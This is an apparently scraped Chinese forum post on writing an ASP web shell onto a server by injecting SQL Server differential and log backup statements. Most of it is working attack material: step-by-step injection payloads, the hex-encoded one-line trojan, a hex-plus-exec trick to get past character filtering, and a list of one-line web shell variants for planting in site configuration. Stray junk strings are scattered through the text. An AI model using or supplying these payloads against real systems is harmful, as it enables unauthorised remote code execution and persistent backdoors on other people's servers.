MSsql差异备份总结

admin

差异备份的流程大概这样：
1.完整备份一次(保存位置当然可以改)
backup database 库名 to disk = 'c:\ddd.bak';--
) f0 Z* Z1 R4 X
) a/ W( ~- ^. I, A, n1 D* M/ v2.创建表并插曲入数据
create table [dbo].[dtest] ([cmd] [image]);
insert into dtest(cmd) values(0x3C25657865637574652872657175657374282261222929253E);--

3.进行差异备份
2 A. t. t" A8 v1 {1 P  d7 Wbackup database 库名 to disk='目标位置\d.asp' WITH DIFFERENTIAL,FORMAT;--

: r" C0 A: p) W! Z4 ?& R1 o% ^上面
0x3C25657865637574652872657175657374282261222929253E
6 g2 U; I- y3 ~就是一句话木马的内容：<%execute(request("a"))%>

如下是网上常见的差异备份代码，思路一样！
2 t/ C' c: o5 D' ~===================================================
利用差异备份提高提高backupwebshell的成功率,减少文件大小
步骤:

declare @a sysname,@s nvarchar(4000) select @a=db_name(),@s=0x77006F006B0061006F002E00620061006B00 backup database @a to disk=@s  --备份数据库
' ~2 R! o3 _- \; n, N
create table [dbo].[xiaolu] ([cmd] [image]);  -- 创建一个表


insert into xiaolu(cmd) values(0x3C25657865637574652872657175657374282261222929253E)  --将一句话木马的16进制字符插入到表中
) f7 }* e; M0 k% C8 T# b
/ g3 n1 y9 h) t8 Z: |6 U6 pdeclare @a sysname,@s nvarchar(4000) select @a=db_name(),@s=0x65003A005C007700650062005C0077006F006B0061006F002E00610073007000 backup database @a to disk=@s WITH DIFFERENTIAL,FORMAT  --对数据库实行差异备份
3 ^9 v! L; W# }3 {2 c
  C. ?. ]6 B) D  i# Sdrop table [xiaolu]  -- 删除此表。
* M2 ]3 p' Z3 r, q0 b' U/ H- g
6 l3 z, J. ~+ ^* i" q: E0x77006F006B0061006F002E00620061006B00为wokao.bak
0 m" l6 u  K/ Z  v  [/ g- C" @0x3C25657865637574652872657175657374282261222929253E是<%execute(request("a"))%>
0x65003A005C007700650062005C0077006F006B0061006F002E00610073007000是e:\web\wokao.asp
1 n4 \( n# W. V( c8 h5 s( _! h% C
声明：方法不是我想的，我只是写工具，默认得到shell是
% E% ]3 L. T. t9 \& x" c<%execute(request("a"))%>
' l5 t- |4 I* d! o  H: a2 r) A===============================================================
* `% T9 F) i7 e9 p7 |
我发现上面代码，有时会无效，而直接用
) b! P+ j, _0 z
! f+ ?2 h1 L2 }+ _/ ]- mbackup database 库名 to disk = 'c:\ddd.bak'
6 w. \: _* ]$ _, z) G1 M; B
create table [dbo].[dtest] ([cmd] [image]);

* b3 G5 _' U, D: F9 U' E/ qinsert into dtest(cmd) values(0x3C25657865637574652872657175657374282261222929253E)
, p* _, |1 \2 w4 |
& c$ C  E: Y% x. o. ybackup database 库名 to disk='目标位置\d.asp' WITH DIFFERENTIAL,FORMAT;--
& _0 l  K0 [+ E5 E' @
却可以成功，所以把最原始的方法写出来！思路是前人所创,这不说大家也知道的！

' h5 a; ]0 U. x$ r) u9 A) g库名 必须要有效的库名，一般注入工具都可以得到！如果某站过滤 "‘",就要把字符内容转为数值了！

网上还有log增量备份的，我也把他记录一下
=====================================================
4 J- R& r0 n# Y另一种log增量备份技术:
0 N7 o5 X' @1 q. ~+ B' G
$ B- t% r8 s. h  z4 p; `( p8 H';alter database null set RECOVERY FULL--
) G3 J  X% e- ]8 k& j
';create table cmd (a image)--

' P3 A. o2 r) Y# q8 X( ]0 d3 g';backup log null to disk = 'f:\cmd' with init--

( \5 K3 c: u* P; m5 p! ]';insert into cmd (a) values (0x3C25657865637574652872657175657374282261222929253EDA)--

" Q# A) U6 l. a2 K1 x) q. J% o';backup log null to disk = '备份路径'--
; Q& a  b4 ^# x: E1 b3 r4 |4 q* |
+ M5 r- Y* [* C';drop table cmd--
4 u0 g) L% N: }1 s& ^
';alter database XXX set RECOVERY SIMPLE--

  a* y, F0 A  c$ b! jPS:0x3C2565786563757465287265717565737428226122292
3 W! Y: g2 D$ U7 a9 j, L9253EDA 是一句话小马16进制转来的
' l6 e! V  q% T
说到一句话马，还可以有这么几种写法：

a)<%%25Execute(request("a"))%%25>
( ^. t1 X2 _! i9 H, f$ ?+ Rb)<%Execute(request("a"))%>
& g3 Q! a  `$ J2 E4 ?  W! xc)%><%execute request("a")%><%
d)<script language=VBScript runat=server>execute request("a")</script>
) I9 |2 ^. w0 q8 i  Se)<%25Execute(request("a"))%25>
f)<%eval(request("a")):response.end%> 备分专用一句话   (也就是插入一句话后所有的代码都无效,在一句话这里打止)
. G5 Q% k9 R( x5 w6 Eg)"%><%eval (request (chr(309)))%><%'" 网站配置版权信息插马专用一句话
' Y# V7 o  [6 o& x- `3 f; Bh)<%On Error Resume Next:response.clear:execute request("value"):response.End%>
I)<%eval request(0)%>
J)"%><%Eval Request(0)%> 网站配置版权信息插马专用一句话
, Y& n0 [) m0 d0 e$ |3 e* f6 g6 y* ^
=============================================
+ b( u( k( }" W* a( Q
当遇到差备过滤了/时用这个语句代替
+ ]1 z  m0 p. C8 D$ T+ F) |6 y, o+ T" x
declare @a varchar(1024);set @a=cast(0x65786563206D6D as varchar(1024));exec (@a);--
3 p" I+ i1 ^1 [  D( Y
把要执行的语句转16进制然后用exec执行

7 T6 G8 @3 p+ N; a2 C7 [
4 o; |( K/ P; t2 }1 J/ t7 N4 U减少备份文件大小方法如下:

总的来说就是那么简单几句,下面以备份数据库model为例子
1
id=1;use model create table cmd(str image);insert into cmd(str) values ('<%25execute(request("a"))%25>')
2
id=1;backup database model to disk='你的路径‘ with differential,format;--
. A/ i% f4 n2 Y( g1 _0 y
8 @4 d# E9 I) _: F4 ?
% _, B- w$ r9 o( U. U
0 r" S. G8 J" p. W, CSQL语句清理日志
注：test为数据库名
, x- O8 c: t2 c2 l" ?; b& I" r
--清空日志
# F3 I9 s5 e+ Z  F/ z5 }9 ^1 u& W& QDUMP TRANSACTION test WITH NO_LOG

  J1 A, k) T# m$ {) B% u# l--截断事务日志
# J2 A  j: ~4 h1 jBACKUP LOG test WITH NO_LOG
6 M& [/ y! K, `
--收缩数据库
DBCC SHRINKDATABASE(test)

( c; p. A: n/ v6 l0 k--收缩指定数据文件,1是文件号,可以通过这个语句查询到
7 m& H3 i5 @( q1 o7 K) g  ySelect * from sysfiles DBCC SHRINKFILE(1)

6 w- K" B9 o* f6 u) [4 U--以后能自动收缩
2 ]* p# {0 S1 L' F3 eEXEC sp_dboption 'test', 'autoshrink', 'TRUE'